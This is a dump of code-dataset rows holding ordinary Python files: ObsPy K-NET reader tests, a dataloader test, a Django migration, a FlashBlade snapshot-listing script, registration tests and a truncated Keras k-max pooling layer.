max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
IRIS_data_download/IRIS_download_support/obspy/io/nied/tests/test_knet_reading.py | earthinversion/Fnet_IRIS_data_automated_download | 2 | 6617351 | <filename>IRIS_data_download/IRIS_download_support/obspy/io/nied/tests/test_knet_reading.py
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
import os
import io
import unittest
import numpy as np
from obspy import read
from obspy.io.nied.knet import _is_knet_ascii
class KnetReadingTestCase(unittest.TestCase):
    """
    Test reading of K-NET and KiK-net ASCII format files from a file.
    """
    def setUp(self):
        # Directory where the test files are located
        self.path = os.path.dirname(__file__)

    def _verify_trace(self, tr):
        """Check peak acceleration and duration of *tr* against its K-NET
        header values (shared by the three read tests)."""
        tr.data *= tr.stats.calib
        tr.data -= tr.data.mean()
        # Maximum acceleration converted to gal; named 'acc_max' to avoid
        # shadowing the builtin max().
        acc_max = np.abs(tr.data).max() * 100
        np.testing.assert_array_almost_equal(acc_max, tr.stats.knet.accmax,
                                             decimal=3)
        duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
        self.assertEqual(duration, int(tr.stats.knet.duration))

    def test_read_knet_ascii(self):
        """Read a K-NET ASCII file given its filename."""
        testfile = os.path.join(self.path, 'data', 'test.knet')
        tr = read(testfile)[0]
        self._verify_trace(tr)

    def test_read_knet_ascii_from_open_files(self):
        """
        Test reading of K-NET and KiK-net ASCII format files from an open file.
        """
        testfile = os.path.join(self.path, 'data', 'test.knet')
        with open(testfile, "rb") as fh:
            tr = read(fh)[0]
        self._verify_trace(tr)

    def test_read_knet_ascii_from_bytes_io(self):
        """
        Tests that reading of K-NET and KiK-net ASCII format files from a
        BytesIO object works.
        """
        testfile = os.path.join(self.path, 'data', 'test.knet')
        with open(testfile, "rb") as fh:
            buf = io.BytesIO(fh.read())
        with buf:
            tr = read(buf)[0]
        self._verify_trace(tr)

    def test_station_name_hack(self):
        """
        Station names in K-NET and KiK-net are 6 characters long which does not
        conform with the SEED standard. Test hack to write the last 2
        characters of the station name into the location field.
        """
        testfile = os.path.join(self.path, 'data', 'test.knet')
        tr = read(testfile, convert_stnm=True)[0]
        self.assertEqual(tr.stats.location, '13')

    def test_is_knet_ascii(self):
        """
        This tests the _is_knet_ascii method by just validating that each file
        in the data directory is a K-NET ascii file and each file in the
        working directory is not.

        The filenames are hard coded so the test will not fail with future
        changes in the structure of the package.
        """
        # K-NET file names.
        knet_filenames = ['test.knet']
        # Non K-NET file names.
        non_knet_filenames = ['test_knet_reading.py',
                              '__init__.py']
        # Loop over K-NET files
        for _i in knet_filenames:
            filename = os.path.join(self.path, 'data', _i)
            self.assertTrue(_is_knet_ascii(filename))
        # Loop over non K-NET files
        for _i in non_knet_filenames:
            filename = os.path.join(self.path, _i)
            self.assertFalse(_is_knet_ascii(filename))
def suite():
    """Build the module's test suite.

    Uses TestLoader.loadTestsFromTestCase(); unittest.makeSuite() is
    deprecated and was removed in Python 3.13.
    """
    return unittest.TestLoader().loadTestsFromTestCase(KnetReadingTestCase)


if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| <filename>IRIS_data_download/IRIS_download_support/obspy/io/nied/tests/test_knet_reading.py
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
import os
import io
import unittest
import numpy as np
from obspy import read
from obspy.io.nied.knet import _is_knet_ascii
class KnetReadingTestCase(unittest.TestCase):
    """
    Test reading of K-NET and KiK-net ASCII format files from a file.
    """
    def setUp(self):
        # Directory where the test files are located
        self.path = os.path.dirname(__file__)

    def _verify_trace(self, tr):
        """Check peak acceleration and duration of *tr* against its K-NET
        header values (shared by the three read tests)."""
        tr.data *= tr.stats.calib
        tr.data -= tr.data.mean()
        # Maximum acceleration converted to gal; named 'acc_max' to avoid
        # shadowing the builtin max().
        acc_max = np.abs(tr.data).max() * 100
        np.testing.assert_array_almost_equal(acc_max, tr.stats.knet.accmax,
                                             decimal=3)
        duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
        self.assertEqual(duration, int(tr.stats.knet.duration))

    def test_read_knet_ascii(self):
        """Read a K-NET ASCII file given its filename."""
        testfile = os.path.join(self.path, 'data', 'test.knet')
        tr = read(testfile)[0]
        self._verify_trace(tr)

    def test_read_knet_ascii_from_open_files(self):
        """
        Test reading of K-NET and KiK-net ASCII format files from an open file.
        """
        testfile = os.path.join(self.path, 'data', 'test.knet')
        with open(testfile, "rb") as fh:
            tr = read(fh)[0]
        self._verify_trace(tr)

    def test_read_knet_ascii_from_bytes_io(self):
        """
        Tests that reading of K-NET and KiK-net ASCII format files from a
        BytesIO object works.
        """
        testfile = os.path.join(self.path, 'data', 'test.knet')
        with open(testfile, "rb") as fh:
            buf = io.BytesIO(fh.read())
        with buf:
            tr = read(buf)[0]
        self._verify_trace(tr)

    def test_station_name_hack(self):
        """
        Station names in K-NET and KiK-net are 6 characters long which does not
        conform with the SEED standard. Test hack to write the last 2
        characters of the station name into the location field.
        """
        testfile = os.path.join(self.path, 'data', 'test.knet')
        tr = read(testfile, convert_stnm=True)[0]
        self.assertEqual(tr.stats.location, '13')

    def test_is_knet_ascii(self):
        """
        This tests the _is_knet_ascii method by just validating that each file
        in the data directory is a K-NET ascii file and each file in the
        working directory is not.

        The filenames are hard coded so the test will not fail with future
        changes in the structure of the package.
        """
        # K-NET file names.
        knet_filenames = ['test.knet']
        # Non K-NET file names.
        non_knet_filenames = ['test_knet_reading.py',
                              '__init__.py']
        # Loop over K-NET files
        for _i in knet_filenames:
            filename = os.path.join(self.path, 'data', _i)
            self.assertTrue(_is_knet_ascii(filename))
        # Loop over non K-NET files
        for _i in non_knet_filenames:
            filename = os.path.join(self.path, _i)
            self.assertFalse(_is_knet_ascii(filename))
def suite():
    """Build the module's test suite.

    Uses TestLoader.loadTestsFromTestCase(); unittest.makeSuite() is
    deprecated and was removed in Python 3.13.
    """
    return unittest.TestLoader().loadTestsFromTestCase(KnetReadingTestCase)


if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| en | 0.871993 | # -*- coding: utf-8 -*- # NOQA @UnusedWildImport Test reading of K-NET and KiK-net ASCII format files from a file. # Directory where the test files are located # Maximum acc converted to gal Test reading of K-NET and KiK-net ASCII format files from an open file. # Maximum acc converted to gal Tests that reading of K-NET and KiK-net ASCII format files from a BytesIO object works. # Maximum acc converted to gal Station names in K-NET and KiK-net are 6 characters long which does not conform with the SEED standard. Test hack to write the last 2 characters of the station name into the location field. This tests the _is_knet_ascii method by just validating that each file in the data directory is a K-NET ascii file and each file in the working directory is not. The filenames are hard coded so the test will not fail with future changes in the structure of the package. # K-NET file names. # Non K-NET file names. # Loop over K-NET files # Loop over non K-NET files | 2.439183 | 2 |
tests/test_dataloader.py | chengweilin114/test | 2 | 6617352 | import pandas as pd
# from ..codes.dataloader import dataloader
from dataloader import dataloader
def test_dataloader():
    """Smoke-test dataloader(): the actual-load result must be a DataFrame."""
    load_file = 'ieso_ga_master_dataset_allWeather_updated2020.csv'
    forecast_file = 'ga_forecasts_top_2.csv'
    # NOTE(review): `forecasts` is returned but never asserted on — consider
    # also checking its type once the expected type is confirmed.
    actual_load, forecasts = dataloader(load_file, forecast_file)
    assert isinstance(actual_load, pd.DataFrame)
| import pandas as pd
# from ..codes.dataloader import dataloader
from dataloader import dataloader
def test_dataloader():
    """Smoke-test dataloader(): the actual-load result must be a DataFrame."""
    load_file = 'ieso_ga_master_dataset_allWeather_updated2020.csv'
    forecast_file = 'ga_forecasts_top_2.csv'
    # NOTE(review): `forecasts` is returned but never asserted on — consider
    # also checking its type once the expected type is confirmed.
    actual_load, forecasts = dataloader(load_file, forecast_file)
    assert isinstance(actual_load, pd.DataFrame)
| en | 0.178345 | # from ..codes.dataloader import dataloader | 2.349058 | 2 |
api/migrations/0003_auto_20181018_1551.py | unrealkaii/tweeto-django-api | 0 | 6617353 | # Generated by Django 2.1.2 on 2018-10-18 14:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates the Reply model and removes the
    tweet_type field from Tweet. Do not edit applied migrations."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('api', '0002_auto_20181018_1527'),
    ]

    operations = [
        migrations.CreateModel(
            name='Reply',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('body', models.TextField(max_length=140)),
                ('date_created', models.DateTimeField(auto_now_add=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                # NOTE(review): this 'tweet' FK targets AUTH_USER_MODEL rather
                # than a Tweet model — looks like a generation mistake; verify
                # against the app's models.py before relying on this schema.
                ('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='replies', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('date_created',),
            },
        ),
        migrations.RemoveField(
            model_name='tweet',
            name='tweet_type',
        ),
    ]
| # Generated by Django 2.1.2 on 2018-10-18 14:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates the Reply model and removes the
    tweet_type field from Tweet. Do not edit applied migrations."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('api', '0002_auto_20181018_1527'),
    ]

    operations = [
        migrations.CreateModel(
            name='Reply',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('body', models.TextField(max_length=140)),
                ('date_created', models.DateTimeField(auto_now_add=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                # NOTE(review): this 'tweet' FK targets AUTH_USER_MODEL rather
                # than a Tweet model — looks like a generation mistake; verify
                # against the app's models.py before relying on this schema.
                ('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='replies', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('date_created',),
            },
        ),
        migrations.RemoveField(
            model_name='tweet',
            name='tweet_type',
        ),
    ]
| en | 0.792752 | # Generated by Django 2.1.2 on 2018-10-18 14:51 | 1.836158 | 2 |
List_FBSnaps.py | PureStorage-OpenConnect/PythonSampleScripts | 12 | 6617354 | import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from base64 import b64encode
import os
import sys
import json
import getpass
from optparse import OptionParser
from datetime import datetime, timedelta
import time
from time import gmtime, strftime, strptime
from operator import itemgetter, attrgetter
# Global Variables
VERSION = '1.0.0'
HEADER = 'Pure Storage List FlashBlade Snapshots (' + VERSION + ')'
BANNER = ('=' * 132)
DEBUG_LEVEL = 0
VERBOSE_FLAG = False
XTOKEN = ''
def create_session(flashBlade, api_token):
    """Log in to the FlashBlade REST API and cache the session token.

    POSTs the api-token to /api/login and stores the returned
    x-auth-token header in the module-level XTOKEN for later requests.
    Exits the program if no session could be established.
    """
    global XTOKEN

    # Set-up HTTP header
    userAgent = 'Jakarta Commons-HttpClient/3.1'
    hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'api-token' : api_token}
    data = {
    }
    params = json.dumps(data)
    path = '/api/login'
    url = 'https://%s%s'%(flashBlade,path)

    # Perform action (verify=False: self-signed certificates are expected)
    print('Attempting to create session')
    response = requests.post(url, params, headers=hdrs, verify=False)

    if DEBUG_LEVEL == 2:
        print('URL', url)
        print('respose', response)
        print('Status', response.status_code)
        print('Text', response.text)
        print('Data', response.json)
        print('HTTP Header:', response.headers)
        print('x-auth-token:', response.headers['x-auth-token'])
        print('')

    # A requests.Response is truthy for 2xx/3xx status codes
    if (response):
        print(BANNER)
        XTOKEN = response.headers['x-auth-token']
    else:
        print(BANNER)
        sys.exit('Exiting: Unable to establish session')

    jsonString = response.text
    jsonData = json.loads(jsonString)
    if VERBOSE_FLAG:
        print(BANNER)
        print(json.dumps(jsonData, sort_keys=False, indent=4))

    name = (jsonData['username'])
    welcome = 'Welcome ' + name
    print(welcome)
def post_url(flashBlade, path, params):
    """POST *params* (a JSON string) to https://<flashBlade><path> and
    return the decoded JSON response body."""
    headers = {
        'Content-Type': 'application/json',
        'User-agent': 'Jakarta Commons-HttpClient/3.1',
        'x-auth-token': XTOKEN,
    }
    url = 'https://%s%s' % (flashBlade, path)

    response = requests.post(url, params, headers=headers, verify=False)

    if DEBUG_LEVEL != 0:
        print('URL', url)
        print('Response Status:', response.status_code)
        print('Text', response.text)
        print('Data', response.json)
        print('HTTP Header:', response.headers)
        print('')

    return json.loads(response.text)
def get_url(flashBlade, path, params):
    """GET https://<flashBlade><path> and return the decoded JSON response.

    ``params`` is accepted for signature symmetry with post_url() but is
    not sent with the request (the original assigned it to an unused
    local; that dead assignment has been removed).
    """
    # Set-up HTTP header
    userAgent = 'Jakarta Commons-HttpClient/3.1'
    hdrs = {'Content-Type': 'application/json', 'User-agent': userAgent, 'x-auth-token': XTOKEN}
    url = 'https://%s%s' % (flashBlade, path)

    # Perform action (verify=False: self-signed certificates are expected)
    response = requests.get(url, headers=hdrs, verify=False)

    if DEBUG_LEVEL != 0:
        print('URL', url)
        print('Response Status:', response.status_code)
        print('Text', response.text)
        print('Data', response.json)
        print('HTTP Header:', response.headers)

    jsonString = response.text
    jsonData = json.loads(jsonString)
    return (jsonData)
def list_fssnaps(flashBlade, fsname, limit):
    """Print a table of file-system snapshots on the FlashBlade.

    If *fsname* is empty, up to *limit* snapshots are listed (sorted by
    name); otherwise only snapshots of that file system are shown
    (sorted by creation time).
    """
    params = json.dumps('')
    if fsname == '':
        path = '/api/1.8/file-system-snapshots?sort=name&limit=%s' % (limit)
    else:
        path = '/api/1.8/file-system-snapshots?sort=created&names_or_sources=%s' % (fsname)

    # Perform action
    jsonData = get_url(flashBlade, path, params)
    if VERBOSE_FLAG:
        print(BANNER)
        print(json.dumps(jsonData, sort_keys=False, indent=4))

    # Count of returned rows
    items = jsonData['items']
    if len(items) == 0:
        print('No File System Snapshots found')
        return

    print('number of snaps:', len(items))
    print(BANNER)
    print('{0:40} {1:60} {2:20}'.format('File System', 'File System Snapshots', 'Created'))
    print(BANNER)
    # Idiomatic for-loop replaces the manual while/index loop; the unused
    # 'r = str(jsonData)' assignment has been removed.
    for item in items:
        source = item['source']
        name = item['name']
        # Keep only the first 10 digits of the timestamp (epoch seconds).
        epoch = int(str(item['created'])[0:10])
        created = time.strftime("%a, %d %b %Y %H:%M:%S %Z", time.localtime(epoch))
        print('{0:40} {1:60} {2:20}'.format(source, name, created))
def parsecl():
    """Define and parse the command-line options.

    Returns the optparse options object; positional arguments are ignored.
    """
    usage = 'usage: %prog [options]'
    version = '%prog ' + VERSION
    description = "This program returns Snapshots for given File System. Please contact <EMAIL> for any assistance."

    parser = OptionParser(usage=usage, version=version, description=description)

    parser.add_option('-d', '--debug',
                      type = 'int',
                      dest = 'DEBUG_LEVEL',
                      default = 0,
                      help = 'Debug level, used for HTTP debugging')
    parser.add_option('-l', '--limit',
                      type = 'int',
                      dest = 'limit',
                      default = 999,
                      help = 'Limit number of responses [default: %default]')
    parser.add_option('-p', '--password',
                      action = 'store',
                      type = 'string',
                      dest = 'password',
                      help = '<PASSWORD>')
    parser.add_option('-f', '--fsname',
                      action = 'store',
                      type = 'string',
                      dest = 'fsname',
                      default = '',
                      help = 'File System name')
    parser.add_option('-s', '--server',
                      action = 'store',
                      type = 'string',
                      dest = 'flashBlade',
                      help = 'Pure FlashArray')
    parser.add_option('-t', '--token',
                      action = 'store',
                      type = 'string',
                      dest = 'api_token',
                      help = 'Pure Api Token')
    parser.add_option('-v', '--verbose',
                      action = 'store_true',
                      dest = 'VERBOSE_FLAG',
                      default = False,
                      help = 'Verbose [default: %default]')

    (options, args) = parser.parse_args()

    # Left over from debugging (no-op string expression):
    '''
    print("Options:", options)
    print("Args:", args)
    '''
    return(options)
def main():
    """Parse the command line, create an API session and list snapshots."""
    # Setup variables
    global DEBUG_LEVEL
    global VERBOSE_FLAG
    exit_code = 0

    # Check for command line parameters
    options = parsecl()
    flashBlade = options.flashBlade
    limit = options.limit
    fsname = options.fsname
    api_token = options.api_token
    DEBUG_LEVEL = options.DEBUG_LEVEL
    VERBOSE_FLAG = options.VERBOSE_FLAG

    if DEBUG_LEVEL != 0:
        print('Flash Blade:', flashBlade)
        print('File System:', fsname)
        print('Limit:', limit)
        print('Api Token:', api_token)
        print('Debug Level:', DEBUG_LEVEL)
        print('Verbose Flag:', VERBOSE_FLAG)

    # Identity comparison with None ('is None') is the idiomatic test;
    # the original used '== None'.
    if flashBlade is None:
        sys.exit('Exiting: You must provide FlashBlade details')

    if api_token is None:
        sys.exit('Exiting: You must provide an API Token')

    print(BANNER)
    print(HEADER + ' - ' + flashBlade)
    print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
    print(BANNER)

    # Create session
    create_session(flashBlade, api_token)

    list_fssnaps(flashBlade, fsname, limit)

    print(BANNER)
    print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
    print(BANNER)
    sys.exit(exit_code)
# Guard the entry point so importing this module does not run the script.
if __name__ == '__main__':
    main()
| import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from base64 import b64encode
import os
import sys
import json
import getpass
from optparse import OptionParser
from datetime import datetime, timedelta
import time
from time import gmtime, strftime, strptime
from operator import itemgetter, attrgetter
# Global Variables
VERSION = '1.0.0'
HEADER = 'Pure Storage List FlashBlade Snapshots (' + VERSION + ')'
BANNER = ('=' * 132)
DEBUG_LEVEL = 0
VERBOSE_FLAG = False
XTOKEN = ''
def create_session(flashBlade, api_token):
    """Log in to the FlashBlade REST API and cache the session token.

    POSTs the api-token to /api/login and stores the returned
    x-auth-token header in the module-level XTOKEN for later requests.
    Exits the program if no session could be established.
    """
    global XTOKEN

    # Set-up HTTP header
    userAgent = 'Jakarta Commons-HttpClient/3.1'
    hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'api-token' : api_token}
    data = {
    }
    params = json.dumps(data)
    path = '/api/login'
    url = 'https://%s%s'%(flashBlade,path)

    # Perform action (verify=False: self-signed certificates are expected)
    print('Attempting to create session')
    response = requests.post(url, params, headers=hdrs, verify=False)

    if DEBUG_LEVEL == 2:
        print('URL', url)
        print('respose', response)
        print('Status', response.status_code)
        print('Text', response.text)
        print('Data', response.json)
        print('HTTP Header:', response.headers)
        print('x-auth-token:', response.headers['x-auth-token'])
        print('')

    # A requests.Response is truthy for 2xx/3xx status codes
    if (response):
        print(BANNER)
        XTOKEN = response.headers['x-auth-token']
    else:
        print(BANNER)
        sys.exit('Exiting: Unable to establish session')

    jsonString = response.text
    jsonData = json.loads(jsonString)
    if VERBOSE_FLAG:
        print(BANNER)
        print(json.dumps(jsonData, sort_keys=False, indent=4))

    name = (jsonData['username'])
    welcome = 'Welcome ' + name
    print(welcome)
def post_url(flashBlade, path, params):
    """POST *params* (a JSON string) to https://<flashBlade><path> and
    return the decoded JSON response body."""
    headers = {
        'Content-Type': 'application/json',
        'User-agent': 'Jakarta Commons-HttpClient/3.1',
        'x-auth-token': XTOKEN,
    }
    url = 'https://%s%s' % (flashBlade, path)

    response = requests.post(url, params, headers=headers, verify=False)

    if DEBUG_LEVEL != 0:
        print('URL', url)
        print('Response Status:', response.status_code)
        print('Text', response.text)
        print('Data', response.json)
        print('HTTP Header:', response.headers)
        print('')

    return json.loads(response.text)
def get_url(flashBlade, path, params):
    """GET https://<flashBlade><path> and return the decoded JSON response.

    ``params`` is accepted for signature symmetry with post_url() but is
    not sent with the request (the original assigned it to an unused
    local; that dead assignment has been removed).
    """
    # Set-up HTTP header
    userAgent = 'Jakarta Commons-HttpClient/3.1'
    hdrs = {'Content-Type': 'application/json', 'User-agent': userAgent, 'x-auth-token': XTOKEN}
    url = 'https://%s%s' % (flashBlade, path)

    # Perform action (verify=False: self-signed certificates are expected)
    response = requests.get(url, headers=hdrs, verify=False)

    if DEBUG_LEVEL != 0:
        print('URL', url)
        print('Response Status:', response.status_code)
        print('Text', response.text)
        print('Data', response.json)
        print('HTTP Header:', response.headers)

    jsonString = response.text
    jsonData = json.loads(jsonString)
    return (jsonData)
def list_fssnaps(flashBlade, fsname, limit):
    """Print a table of file-system snapshots on the FlashBlade.

    If *fsname* is empty, up to *limit* snapshots are listed (sorted by
    name); otherwise only snapshots of that file system are shown
    (sorted by creation time).
    """
    params = json.dumps('')
    if fsname == '':
        path = '/api/1.8/file-system-snapshots?sort=name&limit=%s' % (limit)
    else:
        path = '/api/1.8/file-system-snapshots?sort=created&names_or_sources=%s' % (fsname)

    # Perform action
    jsonData = get_url(flashBlade, path, params)
    if VERBOSE_FLAG:
        print(BANNER)
        print(json.dumps(jsonData, sort_keys=False, indent=4))

    # Count of returned rows
    items = jsonData['items']
    if len(items) == 0:
        print('No File System Snapshots found')
        return

    print('number of snaps:', len(items))
    print(BANNER)
    print('{0:40} {1:60} {2:20}'.format('File System', 'File System Snapshots', 'Created'))
    print(BANNER)
    # Idiomatic for-loop replaces the manual while/index loop; the unused
    # 'r = str(jsonData)' assignment has been removed.
    for item in items:
        source = item['source']
        name = item['name']
        # Keep only the first 10 digits of the timestamp (epoch seconds).
        epoch = int(str(item['created'])[0:10])
        created = time.strftime("%a, %d %b %Y %H:%M:%S %Z", time.localtime(epoch))
        print('{0:40} {1:60} {2:20}'.format(source, name, created))
def parsecl():
    """Define and parse the command-line options.

    Returns the optparse options object; positional arguments are ignored.
    """
    usage = 'usage: %prog [options]'
    version = '%prog ' + VERSION
    description = "This program returns Snapshots for given File System. Please contact <EMAIL> for any assistance."

    parser = OptionParser(usage=usage, version=version, description=description)

    parser.add_option('-d', '--debug',
                      type = 'int',
                      dest = 'DEBUG_LEVEL',
                      default = 0,
                      help = 'Debug level, used for HTTP debugging')
    parser.add_option('-l', '--limit',
                      type = 'int',
                      dest = 'limit',
                      default = 999,
                      help = 'Limit number of responses [default: %default]')
    parser.add_option('-p', '--password',
                      action = 'store',
                      type = 'string',
                      dest = 'password',
                      help = '<PASSWORD>')
    parser.add_option('-f', '--fsname',
                      action = 'store',
                      type = 'string',
                      dest = 'fsname',
                      default = '',
                      help = 'File System name')
    parser.add_option('-s', '--server',
                      action = 'store',
                      type = 'string',
                      dest = 'flashBlade',
                      help = 'Pure FlashArray')
    parser.add_option('-t', '--token',
                      action = 'store',
                      type = 'string',
                      dest = 'api_token',
                      help = 'Pure Api Token')
    parser.add_option('-v', '--verbose',
                      action = 'store_true',
                      dest = 'VERBOSE_FLAG',
                      default = False,
                      help = 'Verbose [default: %default]')

    (options, args) = parser.parse_args()

    # Left over from debugging (no-op string expression):
    '''
    print("Options:", options)
    print("Args:", args)
    '''
    return(options)
def main():
    """Parse the command line, create an API session and list snapshots."""
    # Setup variables
    global DEBUG_LEVEL
    global VERBOSE_FLAG
    exit_code = 0

    # Check for command line parameters
    options = parsecl()
    flashBlade = options.flashBlade
    limit = options.limit
    fsname = options.fsname
    api_token = options.api_token
    DEBUG_LEVEL = options.DEBUG_LEVEL
    VERBOSE_FLAG = options.VERBOSE_FLAG

    if DEBUG_LEVEL != 0:
        print('Flash Blade:', flashBlade)
        print('File System:', fsname)
        print('Limit:', limit)
        print('Api Token:', api_token)
        print('Debug Level:', DEBUG_LEVEL)
        print('Verbose Flag:', VERBOSE_FLAG)

    # Identity comparison with None ('is None') is the idiomatic test;
    # the original used '== None'.
    if flashBlade is None:
        sys.exit('Exiting: You must provide FlashBlade details')

    if api_token is None:
        sys.exit('Exiting: You must provide an API Token')

    print(BANNER)
    print(HEADER + ' - ' + flashBlade)
    print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
    print(BANNER)

    # Create session
    create_session(flashBlade, api_token)

    list_fssnaps(flashBlade, fsname, limit)

    print(BANNER)
    print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
    print(BANNER)
    sys.exit(exit_code)
# Guard the entry point so importing this module does not run the script.
if __name__ == '__main__':
    main()
| en | 0.520473 | # Global Variables # Set-up HTTP header # Perform action # Set-up HTTP header # Perform action # Set-up HTTP header # Perform action # Perform action # Count of returned rows # print("Options:", options) print("Args:", args) # Setup variables # Check for command line parameters # Create session | 2.447586 | 2 |
tests/registering_tests.py | varajala/flask-auth-server | 1 | 6617355 | <gh_stars>1-10
import microtest
from auth_server.extensions import orm
from auth_server.models import User
import auth_server.security as security
@microtest.setup
def setup(app):
    """Push a Flask application context for the whole test module."""
    global ctx
    ctx = app.app_context()
    ctx.push()


@microtest.reset
def reset():
    # Remove all users between tests so each test starts from a clean table.
    User.query.delete()


@microtest.cleanup
def cleanup():
    # NOTE(review): reset_database() is not defined or imported in this
    # file — presumably provided by the microtest fixture namespace;
    # confirm, otherwise this raises NameError at cleanup time.
    reset_database()
    ctx.pop()
@microtest.test
def test_typechecking():
    """register_user must reject wrong argument types and missing arguments."""
    # invalid type for the email field
    bad_type_kwargs = {'email': 10, 'password': '1', 'password_confirm': '2'}
    assert microtest.raises(security.register_user, bad_type_kwargs, TypeError)

    # password_confirm missing entirely
    missing_arg_kwargs = {'email': '1', 'password': '2'}
    assert microtest.raises(security.register_user, missing_arg_kwargs, TypeError)
@microtest.test
def test_valid_registering():
    """A valid registration succeeds and creates an unverified user."""
    err = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is None

    created = User.query.filter_by(email='<EMAIL>').first()
    assert created is not None
    assert not created.is_verified


@microtest.test
def test_registering_invalid_email():
    """A malformed email address is rejected and no user is stored."""
    err = security.register_user(email='asd', password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is not None
    assert len(User.query.all()) == 0


@microtest.test
def test_registering_email_in_user():
    """Registering with an already-used email address fails."""
    USED_EMAIL = '<EMAIL>'
    orm.session.add(User(email=USED_EMAIL, password_hash=''))

    err = security.register_user(email=USED_EMAIL, password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is not None


@microtest.test
def test_registering_invalid_password():
    """An invalid password is rejected and no user is stored."""
    err = security.register_user(email='<EMAIL>', password=' <PASSWORD>', password_confirm=' <PASSWORD>')
    assert err is not None
    assert len(User.query.all()) == 0


@microtest.test
def test_registering_invalid_password_confirm():
    """A mismatching password confirmation is rejected and no user is stored."""
    err = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is not None
    assert len(User.query.all()) == 0
| import microtest
from auth_server.extensions import orm
from auth_server.models import User
import auth_server.security as security
@microtest.setup
def setup(app):
    """Push a Flask application context for the whole test module."""
    global ctx
    ctx = app.app_context()
    ctx.push()


@microtest.reset
def reset():
    # Remove all users between tests so each test starts from a clean table.
    User.query.delete()


@microtest.cleanup
def cleanup():
    # NOTE(review): reset_database() is not defined or imported in this
    # file — presumably provided by the microtest fixture namespace;
    # confirm, otherwise this raises NameError at cleanup time.
    reset_database()
    ctx.pop()
@microtest.test
def test_typechecking():
    """register_user must reject wrong argument types and missing arguments."""
    # invalid type for the email field
    bad_type_kwargs = {'email': 10, 'password': '1', 'password_confirm': '2'}
    assert microtest.raises(security.register_user, bad_type_kwargs, TypeError)

    # password_confirm missing entirely
    missing_arg_kwargs = {'email': '1', 'password': '2'}
    assert microtest.raises(security.register_user, missing_arg_kwargs, TypeError)
@microtest.test
def test_valid_registering():
    """A valid registration succeeds and creates an unverified user."""
    err = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is None

    created = User.query.filter_by(email='<EMAIL>').first()
    assert created is not None
    assert not created.is_verified


@microtest.test
def test_registering_invalid_email():
    """A malformed email address is rejected and no user is stored."""
    err = security.register_user(email='asd', password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is not None
    assert len(User.query.all()) == 0


@microtest.test
def test_registering_email_in_user():
    """Registering with an already-used email address fails."""
    USED_EMAIL = '<EMAIL>'
    orm.session.add(User(email=USED_EMAIL, password_hash=''))

    err = security.register_user(email=USED_EMAIL, password='<PASSWORD>', password_confirm='<PASSWORD>')
    assert err is not None


@microtest.test
def test_registering_invalid_password():
    """An invalid password is rejected and no user is stored."""
    err = security.register_user(email='<EMAIL>', password=' <PASSWORD>', password_confirm=' <PASSWORD>')
    assert err is not None
    assert len(User.query.all()) == 0
@microtest.test
def test_registering_invalid_password_confirm():
error = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0 | zh | 0.08791 | #invalid_type #missing_arg | 2.521115 | 3 |
k_maxpooling.py | evu/VDCNN | 0 | 6617356 | <reponame>evu/VDCNN<filename>k_maxpooling.py
"""Keras layer to extract k highest activations from a sequence."""
import tensorflow as tf
class KMaxPooling(tf.keras.layers.Layer):
    """K-max pooling layer that extracts the k-highest activations from a sequence (2nd dimension)."""

    def __init__(self, k=1, sort=True, **kwargs):
        super().__init__(**kwargs)
        self.input_spec = tf.keras.layers.InputSpec(ndim=3)
        self.k = k
        self.sort = sort

    def get_config(self):
        # Bug fix: the original called super().get_config() but discarded
        # the result and returned None, which breaks layer serialization
        # (model saving / cloning). Return the parent config extended with
        # this layer's constructor arguments.
        config = super().get_config()
